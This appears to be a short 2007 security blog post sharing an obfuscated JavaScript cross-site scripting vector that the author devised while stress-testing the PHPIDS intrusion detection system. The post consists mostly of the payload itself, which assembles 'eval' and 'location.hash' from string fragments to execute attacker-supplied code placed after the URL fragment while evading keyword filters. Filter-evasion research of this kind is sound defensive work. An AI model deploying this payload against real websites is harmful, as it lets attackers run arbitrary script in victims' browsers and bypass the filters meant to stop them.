--- layout: post status: publish published: true title: Obfuscated fun wordpress_id: 263 wordpress_url: http://pro.grammatic.org/post-obfuscated-fun-37.aspx date: !binary |- MjAwNy0wNy0wNSAyMDoyNzo1MyArMDIwMA== date_gmt: !binary |- MjAwNy0wNy0wNSAyMDoyNzo1MyArMDIwMA== categories: - Technology - InfoSec tags: - information security - XSS - Javascript comments: [] ---
Just thought I'd share the following script vector with you all that I came up with while stressing PHPIDS today:
{% highlight javascript %} l= 0 || 'str',m= 0 || 'sub',x= 0 || 'al',y= 0 || 'ev',g= 0 || 'tion.h',f= 0 || 'ash',k= 0 || 'loca',d= (k) + (g) + (f),a=0 || (y) + (x),b=1[a](d),c=0 || (m) + (l),1[a](b[c](1)); {% endhighlight %}Put that inside a script block and believe it or not it will eval the text after the fragment identifier.